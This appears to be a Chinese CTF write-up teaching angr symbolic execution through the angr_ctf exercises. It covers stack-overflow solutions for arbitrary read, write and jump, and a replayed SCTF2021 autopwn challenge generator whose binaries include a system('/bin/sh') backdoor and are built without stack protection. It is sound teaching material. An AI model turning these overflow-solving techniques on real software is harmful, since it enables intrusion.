angr - CTF Wiki (ctf-wiki.org)是一个很好的项目帮助快速入门angr的使用,刚刚应该通过这个入门的….

explore

angr_find

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl main(int argc, const char **argv, const char **envp)
{
int i; // [esp+1Ch] [ebp-1Ch]
char s1[9]; // [esp+23h] [ebp-15h] BYREF
unsigned int v6; // [esp+2Ch] [ebp-Ch]

v6 = __readgsdword(0x14u);
printf("Enter the password: ");
__isoc99_scanf("%8s", s1);
for ( i = 0; i <= 7; ++i )
s1[i] = complex_function(s1[i], i);
if ( !strcmp(s1, "JACEJGCS") )
puts("Good Job.");
else
puts("Try again.");
return 0;
}

十分简单的逆向,

1
2
3
4
5
6
7
import angr

proj = angr.Project('dist/00_angr_find')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=0x8048678)
print(simgr.found[0].posix.dumps(0))

angr_avoid

这题的main函数非常庞大导致无法反编译,也无法手动分析程序流程

但可以看到有一个avoid函数

1
2
3
4
void avoid_me()
{
should_succeed = 0;
}

和最终成功函数

1
2
3
4
5
6
7
int __cdecl maybe_good(char *s1, char *s2)
{
if ( should_succeed && !strncmp(s1, s2, 8u) )
return puts("Good Job.");
else
return puts("Try again.");
}

添加avoid

1
2
3
4
5
6
7
import angr

proj = angr.Project('dist/01_angr_avoid')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=0x80485E0, avoid=0x80485A8)
print(simgr.found[0].posix.dumps(0))

angr_find_condition

因为有很多重复代码块,所以这题也有很多可能会输出”Good Job.”的地址,这时候我们像00_angr_find那样设定一个单一的目标地址就不太可能了。不过幸好,explore函数的find参数除了地址外,也可以是一个携带SimState参数的函数,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
import angr

def is_successful(state):
return b'Good Job.' in state.posix.dumps(1)

def should_avoid(state):
return b'Try again.' in state.posix.dumps(1)

proj = angr.Project('dist/02_angr_find_condition')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=is_successful, avoid=should_avoid)
print(simgr.found[0].posix.dumps(0))

symbolic

angr在默认情况下只会符号化从标准输入流中读取的数据,而实际情况往往需要我们符号化其他数据,如寄存器、某块内存甚至是某个文件。

angr_symbolic_registers

用之前的方法也能跑出答案,

从用户读取的三个数字被保存到了eax,ebx,edx中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import angr
import claripy

proj = angr.Project('../dist/03_angr_symbolic_registers')
state = proj.factory.blank_state(addr=0x8048980)
password0 = claripy.BVS('password0', 32)
password1 = claripy.BVS('password1', 32)
password2 = claripy.BVS('password2', 32)
state.regs.eax = password0
state.regs.ebx = password1
state.regs.edx = password2
simgr = proj.factory.simgr(state)
simgr.explore(find=0x80489E6)
solver = simgr.found[0].solver
print(f'password0: {hex(solver.eval(password0))}')
print(f'password1: {hex(solver.eval(password1))}')
print(f'password2: {hex(solver.eval(password2))}')

注意这里的初始state是通过blank_state函数而不是entry_state函数获得的:

1
state = proj.factory.blank_state(addr=0x8048980)

因为在0x8048980之前的指令对我们的求解其实是没有任何作用的,包括get_user_input函数,因为接下来我们就要将get_user_input函数的结果符号化了,而不是让angr自动帮我们符号化通过scanf读取的数据

angr_symbolic_stack

对栈空间内的数据进行符号化

这题将scanf读取的数据保存在栈上,并且通过ebp索引这些符号值(比如[ebp+var_C]),所以我们得让ebp有一个正确的初值了。之所以说是正确的初值,是因为我们跳过了函数开头对栈的调整,因此我们还需要手动调整ebp的值

ebp的值是什么不重要,我们只需要保证它和esp的偏移是正确的即可,对前面的汇编指令进行分析我们可以得出此时ebp的偏移量为:0x18+4+4+4+4=40

1
state.regs.ebp = state.regs.esp + 40

然后对esp的值执行调整,使我们接下来push进去的符号值恰好在[ebp+var_10]和[ebp+var_C]这两个位置,记得push完之后要把esp调回来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import angr
import claripy

proj = angr.Project('../dist/04_angr_symbolic_stack')
state = proj.factory.blank_state(addr=0x8048694)
state.regs.ebp = state.regs.esp + 40
state.regs.esp = state.regs.ebp - 0xC + 4
password0 = claripy.BVS('password0', 32)
password1 = claripy.BVS('password1', 32)
state.stack_push(password0)
state.stack_push(password1)
state.regs.esp = state.regs.ebp - 40
simgr = proj.factory.simgr(state)
simgr.explore(find=0x80486E1)
solver = simgr.found[0].solver
print(f'password0: {hex(solver.eval(password0))}')
print(f'password1: {hex(solver.eval(password1))}')

angr_symbolic_memory

用户输入被保存在全局变量中

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import angr
import claripy

proj = angr.Project('../dist/05_angr_symbolic_memory')
state = proj.factory.blank_state(addr=0x80485FE)
password0 = claripy.BVS('password0', 64)
password1 = claripy.BVS('password1', 64)
password2 = claripy.BVS('password2', 64)
password3 = claripy.BVS('password3', 64)
state.mem[0xA1BA1C0].uint64_t = password0
state.mem[0xA1BA1C0 + 8].uint64_t = password1
state.mem[0xA1BA1C0 + 16].uint64_t = password2
state.mem[0xA1BA1C0 + 24].uint64_t = password3
simgr = proj.factory.simgr(state)
simgr.explore(find=0x804866A)
solver = simgr.found[0].solver
print(f'password0: {solver.eval(password0, cast_to=bytes)}')
print(f'password1: {solver.eval(password1, cast_to=bytes)}')
print(f'password2: {solver.eval(password2, cast_to=bytes)}')
print(f'password3: {solver.eval(password3, cast_to=bytes)}')

如果我们要获取内存中的数据(具体值或者符号值),可以这样用:

1
2
>>> state.mem[0xA1BA1C0].uint64_t.resolved
<BV64 password0_0_64>

angr_symbolic_dynamic_memory

这题使用了malloc函数来动态分配内存,因此输入的地址就不是固定的

但我们仍然可以在内存中选定一块区域作为输入的地址,比如说在.bss段选定一块未使用的16字节区域,然后对输入进行符号化

并将缓冲区的地址设成我们刚刚选定的地址,这样做完全可行,是因为我们初始化的state已经跳过了malloc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import angr
import claripy

proj = angr.Project('../dist/06_angr_symbolic_dynamic_memory')
state = proj.factory.blank_state(addr=0x8048696)
password0 = claripy.BVS('password0', 64)
password1 = claripy.BVS('password1', 64)
state.mem[0xABCC700].uint64_t = password0
state.mem[0xABCC700 + 8].uint64_t = password1
state.mem[0xABCC8A4].uint32_t = 0xABCC700
state.mem[0xABCC8AC].uint32_t = 0xABCC700 + 8
simgr = proj.factory.simgr(state)
simgr.explore(find=0x8048759)
solver = simgr.found[0].solver
print(f'password0: {solver.eval(password0, cast_to=bytes)}')
print(f'password1: {solver.eval(password1, cast_to=bytes)}')

angr_symbolic_file

这题是先把输入写进文件,再从文件中读取输入

在这题中我们要忽略scanf,直接对文件的内容进行符号化。要对文件内容进行符号化,首先我们要创建一个模拟的文件SimFile,文件名为’OJKSQYDP.txt’,内容为8字节的符号值,大小为0x40字节:

1
2
password0 = claripy.BVS('password0', 64)
sim_file = angr.SimFile(name='OJKSQYDP.txt', content=password0, size=0x40)

然后插入到state的文件系统(FileSystem)中,state的文件系统可以通过state.fs获得:

1
state.fs.insert('OJKSQYDP.txt', sim_file)

完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
import angr
import claripy

proj = angr.Project('../dist/07_angr_symbolic_file')
state = proj.factory.blank_state(addr=0x80488D3)
password0 = claripy.BVS('password0', 64)
sim_file = angr.SimFile(name='OJKSQYDP.txt', content=password0, size=0x40)
state.fs.insert('OJKSQYDP.txt', sim_file)
simgr = proj.factory.simgr(state)
simgr.explore(find=0x80489AD)
solver = simgr.found[0].solver
print(f'password0: {solver.eval(password0, cast_to=bytes)}')

constraints

angr在符号执行的过程中,会将路径约束保存在SimState内置的约束求解器内。

这题的流程是先对输入加密,然后调用check_equals_xxx函数对加密后的输入进行比较,若比对成功则输出”Good Job.”

check_equals_AUPDNNPROEZRJWKB函数会将输入与”AUPDNNPROEZRJWKB”进行比较

这题直接调用explore是跑不出来的,因为在check_equals函数中不是比对失败就立刻退出循环,而是一直循环到最后。总共有16轮循环,每次循环会产生比对成功和比对失败两个状态,所以符号执行总共会产生216个状态,导致路径爆炸

1
2
3
4
5
6
7
8
9
10
11
12
13
import angr
import claripy

proj = angr.Project('../dist/08_angr_constraints')
state = proj.factory.blank_state(addr=0x8048622)
password = claripy.BVS('password', 16 * 8)
buffer_addr = 0x804A050
state.memory.store(buffer_addr, password)
simgr = proj.factory.simgr(state)
simgr.explore(find=0x8048669)# 执行check_equals_AUPDNNPROEZRJWKB函数之前
found = simgr.found[0]
found.add_constraints(found.memory.load(buffer_addr, 16) == b'AUPDNNPROEZRJWKB')
print(found.solver.eval(password, cast_to=bytes))

hooks

angr_hooks

与上题不同的是,这题的比较函数不在整个加密流程的最后,所以我们不能再采用上题手动添加约束并求解的方法

既然check_equals函数本身的流程非常简单,那么我们就可以用hook技术将check_equals函数替换为一个等效的并且不会导致路径爆炸的函数,然后再进行符号执行

注意这里的hook是对call指令进行了hook,而不是函数本身,length指的是跳过的字节数,call指令占5个字节,所以length=5:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import angr
import claripy

proj = angr.Project('../dist/09_angr_hooks')

@proj.hook(addr=0x80486B3, length=5) # check_equals_XYMKBKUHNIQYNQXE
def my_check_equals(state):
buffer_addr = 0x804A054
buffer = state.memory.load(buffer_addr, 16)
state.regs.eax = claripy.If(buffer == b'XYMKBKUHNIQYNQXE', claripy.BVV(1, 32), claripy.BVV(0, 32))

state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

angr_simprocedures

现在我们没法hook所有掉call指令了,因为call指令实在是太多了

接下来我们就要引入一种对函数本身进行hook的方法——SimProcedures,定义一个SimProcedures的代码如下:

1
2
3
4
5
class MyCheckEquals(angr.SimProcedure):

def run(self, buffer_addr, length):
buffer = self.state.memory.load(buffer_addr, length)
return claripy.If(buffer == b'ORSDDWXHZURJRBDH', claripy.BVV(1, 32), claripy.BVV(0, 32))

SimProcedure按字面意思来理解就是“模拟程序”,在这里我们用一个SimProcedure的子类MyCheckEquals模拟了check_equals_ORSDDWXHZURJRBDH函数的功能,SimProcedure中的run函数由子类实现,其接收的参数与C语言中的参数保持一致,返回为对应原函数的返回值。

定义好了SimProcedure之后,我们需要调用hook_symbol函数对程序中名为check_equals_ORSDDWXHZURJRBDH的函数进行hook:

1
proj.hook_symbol(symbol_name='check_equals_ORSDDWXHZURJRBDH', simproc=MyCheckEquals())

hook之后angr在符号执行的过程中将不会调用原先的check_equals_ORSDDWXHZURJRBDH函数,而是MyCheckEquals类中的run函数。然后我们就可以用老方法解决这道题了,完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import angr
import claripy

class MyCheckEquals(angr.SimProcedure):

def run(self, buffer_addr, length):
buffer = self.state.memory.load(buffer_addr, length)
return claripy.If(buffer == b'ORSDDWXHZURJRBDH', claripy.BVV(1, 32), claripy.BVV(0, 32))

proj = angr.Project('../dist/10_angr_simprocedures')
proj.hook_symbol(symbol_name='check_equals_ORSDDWXHZURJRBDH', simproc=MyCheckEquals())
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

angr_sim_scanf

angr_ctf给的说法是angr不支持多个参数的scanf

1
2
# This time, the solution involves simply replacing scanf with our own version,
# since Angr does not support requesting multiple parameters with scanf.

然而实际上是可以的,可能以前的版本不行,毕竟angr版本迭代还是很快的:

1
2
3
4
5
6
7
8
9
10
import angr

proj = angr.Project('/dist/11_angr_sim_scanf')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

输出:

1
b'1448564819 1398294103'

angr在angr/procedures中定义了很多模拟系统函数的SimProcedures:

angr/angr/procedures at master · angr/angr (github.com)

1
2
3
4
5
6
7
8
9
10
11
import angr

proj = angr.Project('../dist/11_angr_sim_scanf')
proj.hook_symbol("__isoc99_scanf", angr.SIM_PROCEDURES['libc']['scanf']()) #
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

veritesting

缓解路径爆炸的第三种方法——Veritesting

angr中实现了上述论文中提到的Veritesting技术,我们只需要在构建simgr的时候添加一个veritesting=True参数即可,代码如下:

1
simgr = proj.factory.simgr(state, veritesting=True)

跑出来还是要花一点时间

1
2
3
4
5
6
7
8
9
10
import angr

proj = angr.Project('../dist/12_angr_veritesting')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state, veritesting=True)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

这种写法与上面的写法是等价的:

1
2
simgr = proj.factory.simgr(state)
simgr.use_technique(angr.exploration_techniques.Veritesting())

library

angr_static_binary

angr没有成功识别静态库函数并替换,需要我们手动替换,防止angr符号执行陷进复杂的库函数里面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import angr

proj = angr.Project('../dist/13_angr_static_binary')

proj.hook_symbol('printf', angr.SIM_PROCEDURES['libc']['printf']())
proj.hook_symbol('__isoc99_scanf',angr.SIM_PROCEDURES['libc']['scanf']())
proj.hook_symbol('strcmp', angr.SIM_PROCEDURES['libc']['strcmp']())
proj.hook_symbol('puts', angr.SIM_PROCEDURES['libc']['puts']())
proj.hook_symbol('__libc_start_main',angr.SIM_PROCEDURES['glibc']['__libc_start_main']())
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

angr_shared_library

了解如何对动态链接库中单个的函数进行符号执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[16]; // [esp+1Ch] [ebp-1Ch] BYREF
unsigned int v5; // [esp+2Ch] [ebp-Ch]

v5 = __readgsdword(0x14u);
memset(s, 0, sizeof(s));
printf("Enter the password: ");
__isoc99_scanf("%8s", s);
if ( validate(s, 8) )
puts("Good Job.");
else
puts("Try again.");
return 0;
}

其中validate函数是动态链接库lib14_angr_shared_library.so的函数:

我们可以直接通过call_state创建一个函数调用的初始状态:

1
state = proj.factory.call_state(validate_addr, password, length)

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import angr
import claripy

proj = angr.Project('/dist/lib14_angr_shared_library.so')

validate_addr = 0x4006D7
password = claripy.BVS('password', 8 * 8)
length = claripy.BVV(8, 32)
state = proj.factory.call_state(validate_addr, password, length)
simgr = proj.factory.simgr(state)
simgr.explore(find=0x400783)
found = simgr.found[0]
found.solver.add(found.regs.eax == 1)
print(found.solver.eval(password, cast_to=bytes))

动态链接库都是地址无关的可执行文件(position-independent executable,PIE),若不手动指定PIE的基质,angr会将符号执行的基址指定为默认的0x400000,并输出:

1
WARNING | 2021-10-07 00:15:28,674 | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.

当然也可以自行指定基址,方法如下:

1
2
3
4
5
proj = angr.Project('../dist/lib14_angr_shared_library.so', load_options={
'main_opts' : {
'base_addr' : 0x400000
}
})

overflow

angr_ctf系列的最后一节,在这一节我们通过三个栈溢出的例子来学习angr在漏洞挖掘方向的简单应用。

angr_arbitrary_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [esp+Ch] [ebp-1Ch] BYREF
char *s; // [esp+1Ch] [ebp-Ch]

s = try_again;
printf("Enter the password: ");
__isoc99_scanf("%u %20s", &key, &v4);
if ( key == 41810812 )
puts(s);
else
puts(try_again);
return 0;
}

scanf处有一个溢出,可以通过scanf将s的地址覆盖为0x484F6038,使puts(s)能够打印”Good Jobs”

直接梭哈的话不太行,angr没有分析出这个栈溢出漏洞,原因可能是angr无法分析出”Good Job”来自哪个地址:

1
2
3
4
5
6
7
8
9
10
import angr

proj = angr.Project('../dist/15_angr_arbitrary_read')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(
find=lambda state : b'Good Job.' in state.posix.dumps(1),
avoid=lambda state: b'Try again.' in state.posix.dumps(1)
)
print(simgr.found[0].posix.dumps(0))

该题是通过puts输出的,所以我们可以将判断输出中是否包含”Good Job.”的条件改为,puts的参数是否为”Good Job.”的地址,即0x484F6038。检测puts参数的代码如下,很好理解:

1
2
3
4
5
6
7
8
9
10
11
def check_puts(state):
puts_parameter = state.memory.load(state.regs.esp + 4, 4, endness=proj.arch.memory_endness)
if state.solver.symbolic(puts_parameter):
good_job_string_address = 0x484F6038
is_vulnerable_expression = puts_parameter == good_job_string_address
copied_state = state.copy()
copied_state.add_constraints(is_vulnerable_expression)
if copied_state.satisfiable():
state.add_constraints(is_vulnerable_expression)
return True
return False

explore的条件is_successful:

1
2
3
4
5
def is_successful(state):
puts_address = 0x08048370
if state.addr == puts_address:
return check_puts(state)
return False

程序的流程并不是很复杂,所以本题的关键还是在于给explore函数找到一个合适的判定条件。在自动化Pwn中,这个条件往往要改为执行到system("/bin/sh")

完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import angr

def check_puts(state):
puts_parameter = state.memory.load(state.regs.esp + 4, 4, endness=proj.arch.memory_endness)
if state.solver.symbolic(puts_parameter):
good_job_string_address = 0x484F6038
is_vulnerable_expression = puts_parameter == good_job_string_address
copied_state = state.copy()
copied_state.add_constraints(is_vulnerable_expression)
if copied_state.satisfiable():
state.add_constraints(is_vulnerable_expression)
return True
return False

def is_successful(state):
puts_address = 0x08048370
if state.addr == puts_address:
return check_puts(state)
return False

proj = angr.Project('../dist/15_angr_arbitrary_read')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=is_successful)
print(simgr.found[0].posix.dumps(0))

有一个要注意的地方是这里:

1
puts_parameter = state.memory.load(state.regs.esp + 4, 4, endness=proj.arch.memory_endness)

endness=proj.arch.memory_endness是指定读取的方式为小端。

angr_arbitrary_write

这题的思路稍微比上题复杂一点,在这题中我们可以通过scanf将dest覆盖成任意地址,然后通过第二个strncpy向dest中保存的地址写入任何数据,因此我们可以向任何地址写入任何数据,这是一个任意写漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[16]; // [esp+Ch] [ebp-1Ch] BYREF
char *dest; // [esp+1Ch] [ebp-Ch]

dest = unimportant_buffer;
memset(s, 0, sizeof(s));
strncpy(password_buffer, "PASSWORD", 0xCu);
printf("Enter the password: ");
__isoc99_scanf("%u %20s", &key, s);
if ( key == 11604995 )
strncpy(dest, s, 0x10u);
else
strncpy(unimportant_buffer, s, 0x10u);
if ( !strncmp(password_buffer, "NDYNWEUJ", 8u) )
puts("Good Job.");
else
puts("Try again.");
return 0;
}

首先我们将dest覆盖成password_buffer的地址,然后再通过第二个strncpy往dest中写入”PASSWORD”,最后输出”Good Job.”

直接梭哈还是不行,原因可能是angr没有判断出password_buffer可以被覆盖为符号值。

还是按照上题的思路,这回我们要check的是strncpy函数,约束条件为dest指向的地址为password_buffer,并且src为”NDYNWEUJ”,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import angr
import claripy

def check_strncpy(state):
dest = state.memory.load(state.regs.esp + 4, 4, endness=proj.arch.memory_endness)
src = state.memory.load(state.regs.esp + 8, 4, endness=proj.arch.memory_endness)
src_content = state.memory.load(src, 8)
if state.solver.symbolic(src_content) and state.solver.symbolic(dest):
is_vulnerable_expression = claripy.And(src_content == b'NDYNWEUJ', dest == 0x57584344)
copied_state = state.copy()
copied_state.add_constraints(is_vulnerable_expression)
if copied_state.satisfiable():
state.add_constraints(is_vulnerable_expression)
return True
return False

def is_successful(state):
strncpy_address = 0x08048410
if state.addr == strncpy_address:
return check_strncpy(state)
return False

proj = angr.Project('../dist/16_angr_arbitrary_write')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=is_successful)
print(simgr.found[0].posix.dumps(0))

angr_arbitrary_jump

rop

1
2
3
4
5
6
int read_input()
{
char v1[32]; // [esp+28h] [ebp-20h] BYREF

return __isoc99_scanf("%s", v1);
}

当一个指令有很多分支的可能性时,称之为不受约束(unconstrained)的状态, 比如说当用户的输入决定下一条指令的位置。angr 在遇到不受约束的状态时会将其抛出,本题将要关闭这个默认行为,转而利用此状态去求解能够跳转到print_good函数的payload。

求解步骤:

  • 初始化proj,让 angr 记录不受约束的状态
  • 开始step直到发现 eip 为符号的状态
  • 约束 eip 与 print_good 函数地址相同
  • 约束求解

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import angr
import claripy

proj = angr.Project('../dist/17_angr_arbitrary_jump')
payload = claripy.BVS('payload', 64 * 8)
state = proj.factory.entry_state(stdin=payload)
simgr = proj.factory.simgr(
state,
save_unconstrained=True,
stashes={
'active':[state],
'unconstrained': [],
'found': [],
})
while (len(simgr.active) or len(simgr.unconstrained)) and not len(simgr.found):
for unconstrained in simgr.unconstrained:
eip = unconstrained.regs.eip
print_good_addr = 0x42585249
if unconstrained.satisfiable(extra_constraints=[eip == print_good_addr]):
unconstrained.add_constraints(eip == print_good_addr)
simgr.move('unconstrained', 'found')
break
simgr.drop(stash="unconstrained")
simgr.step()

print(simgr.found[0].posix.dumps(0))

打印unconstrained状态,可以发现其地址是由输入决定的:

1
2
>>> unconstrained
<SimState @ <BV32 payload_0_512[199:192] .. payload_0_512[207:200] .. payload_0_512[215:208] .. payload_0_512[223:216]>>

所以我们对eip进行约束求解,就能找到会导致栈溢出的payload。

sctf2021-CheckIn_ret2text

因为是复现,所以直接看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
import hashlib
import base64
import os
import string
import random
import tempfile
import itertools
import sys
L = string.ascii_letters
R = random.randint
C = random.choice
exploit_size = R(10, 20)
gifted = False

def rnd_str(n):
return "".join([L[R(0, len(L) - 1)] for _ in range(n)])

def gen_chall_enc(v, n, l = 0):
op_list = ["^", "^", "^"]
encs = ["%s[%d] %s= 0x%x;" % (v, i, op_list[R(0, len(op_list) - 1)], R(0, 255)) for i in range(n)]
random.shuffle(encs)
if l != 0: encs = random.sample(encs, l)
return "\n".join(encs)

def gen_exploit():
code = f"""
printf("{rnd_str(10) + ":"}");
input_line(exp_buffer, {exploit_size + 40});
{gen_chall_enc("exp_buffer", exploit_size, 5)}
if (fksth(exp_buffer, "{rnd_str(exploit_size - 1)}") == 0) return 0;
"""
return code

def gen_chall_1(l, r):
challenge_name = rnd_str(R(10, 20))
challenge_code = rnd_str(R(30, 60))
challenge_len = len(challenge_code)
code = f"""
char chall[{challenge_len}];
printf("{challenge_name + ":"}");
input_line(chall, {challenge_len});
{gen_chall_enc("chall", challenge_len)}
if(fksth(chall, "{challenge_code}") == 0) {{
{l}
}} else {{
{r}
}}
"""
return code

def gen_chall_2(l, r):
op_list = ["+", "-", "*", "^"]
num_num = R(4, 8)
challs = []
while len(challs) < 3:
challs = []
for pair in itertools.combinations(range(num_num), 2):
challs.append(f"(d[{pair[0]}] {C(op_list)} d[{pair[1]}]) == {hex(R(0, 0xFFFF))}")
for pair in itertools.combinations(range(num_num), 3):
challs.append(f"(d[{pair[0]}] {C(op_list)} d[{pair[1]}] {C(op_list)} d[{pair[2]}]) == {hex(R(0, 0xFFFF))}")

challs = random.sample(challs, 1)
lll = []
for i in challs: lll.append(f"""if({i}) {{ {l} }} else {{ {r} }} ;""" )
code_1 = "\n".join(lll)
sss = "\n".join(["d[%d] = input_val();" % i for i in range(num_num)])
code = f"""
int d[{num_num}];
printf("{rnd_str(10) + ":"}");
{sss}
{code_1}
"""
return code

def gen_pwn(deep):
global gifted
chall_func = random.choice([gen_chall_1, gen_chall_2])
if deep == 0:
r = "return 0;"

if not gifted and random.randint(1, 5) == 4:
gifted = True
l = gen_exploit()
else:
l = "return 0;"
else:
r = gen_pwn(deep - 1)
l = gen_pwn(deep - 1)
return chall_func(l, r)

def gen_challenge():
global gifted, exploit_size
gifted = False
template = """
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPLOIT_SIZE 100
int input_val() {
char buffer[20];
int i = 0;
char ch = getchar();
while(ch != ' ' && i < 19) {
buffer[i++] = ch;
ch = getchar();
}
buffer[i] = 0;
return atoi(buffer);
}

int input_line(char * buffer, size_t max_size) {
int i;
for(i = 0; i < max_size; i++) {
char ch = getchar();
buffer[i] = ch;
}
buffer[i] = 0;
return i;
}

int fksth(const char * s1, const char * s2) {
int sum = 0;
for(int i = 0; s1[i] != 0 && s2[i] != 0 ; i++) {
sum += (s1[i] - s2[i]);
}
return sum;
}

char data[4096] = {0};

void backdoor() {
system("/bin/sh");
}

void nothing() {
printf("nothing\\n");
}
void init() {
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
alarm(120);
}

int main() {
char exp_buffer[%d];
init();
{
%s
}
}
""" % (exploit_size, gen_pwn(6)) # 6
filename = rnd_str(6)
source_file = os.path.join(tempfile.gettempdir(), filename + ".cpp")
out_file ="/home/ctf/chall_" + filename
open(source_file, "w").write(template)
os.system("g++ %s -O0 -no-pie -fno-stack-protector -o %s " % (source_file, out_file))
if not os.path.exists(out_file):
print("Compile Failed!")
return None, None
else:
return open(out_file, "rb").read(), out_file


def proof_of_work():
s = "".join(random.sample(string.ascii_letters + string.digits, 20))
prefix = s[:4]
print("sha256(xxxx + %s) == %s " % (s[4:],hashlib.sha256(s.encode()).hexdigest()))
print("give me xxxx:")
ans = input().strip()
return len(ans) == 4 and ans == prefix

print("Welcome to SCTF, gl!")
print("AutoCheckin Challenge!")
print("Easy StackOverFlow!!!!!!!")
try:
if not proof_of_work():
exit()
except:
exit()

data, file = gen_challenge()
if data != None:
print(base64.b64encode(data).decode("ASCII"))
print("==end==")
sys.stdout.flush()
os.system("/usr/sbin/chroot --userspec=1000:1000 /home/ctf ./" + os.path.basename(file))
os.unlink(file)
print("Bye bye!")

网上并没有找到比较详细的wp,这么一大坨python代码看着其实还是有点头大的,但还是能看出来这是在生成一个会受随机因素影响的c文件,然后编译

正常运行的话,最终也是会给出二进制可执行文件的base64数据,本地可以接收到,也就是本地能得到二进制文件,也就是autopwn这类题的常规套路了

实际上做题的时候是无法得到这个py文件的

不过复现嘛,本地我们可以选择稍微修改以下脚本,然后让其将源文件输出出来,于是得到了一个有四千多行的源码(直接看反编译也差不多)

生成的一大坨类似这样的代码,稍微理解一下最终的题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
chall[33] ^= 0x7d;
chall[4] ^= 0xca;
chall[38] ^= 0xa8;
chall[44] ^= 0x84;
chall[15] ^= 0xcf;
chall[1] ^= 0xac;
chall[16] ^= 0x58;
chall[20] ^= 0xfd;
chall[12] ^= 0x2;
chall[47] ^= 0x3d;
chall[13] ^= 0xa8;
chall[50] ^= 0x88;
chall[39] ^= 0x99;
chall[23] ^= 0xd6;
chall[34] ^= 0x4e;
chall[54] ^= 0x82;
chall[48] ^= 0x17;
if(fksth(chall, "UtqILiNEQkZPtTJqzysqGduSIKNTXDJRYHWEVqvioXtGdTMdSHxYMOA") == 0) {

int d[6];
printf("pZicbrnwUg:");
d[0] = input_val();
d[1] = input_val();
d[2] = input_val();
d[3] = input_val();
d[4] = input_val();
d[5] = input_val();
if((d[2] + d[3]) == 0xda0c) { return 0; } else { return 0; } ;

} else {

char chall[37];
printf("EGNAdszGujynjUVS:");
input_line(chall, 37);
chall[13] ^= 0x63;
chall[33] ^= 0xea;
chall[10] ^= 0x52;
chall[29] ^= 0x22;
chall[22] ^= 0x6d;
chall[17] ^= 0xb2;
chall[4] ^= 0x54;
chall[14] ^= 0x6;
chall[21] ^= 0xdd;
chall[31] ^= 0x8f;
chall[28] ^= 0xc8;
chall[25] ^= 0x5e;

最后能够找到有一个溢出

1
2
3
4
5
6
7
8
9
10
11
if ( !(unsigned int)fksth(&v2394, "ckNoMypfzSlqmjBYgPMLwKMbRBCiHuQyVacpXXAWKMZnKtJodDviIbMG") )
{
printf("jTQSsBTwBM:");
input_line(v3072, 0x3AuLL);
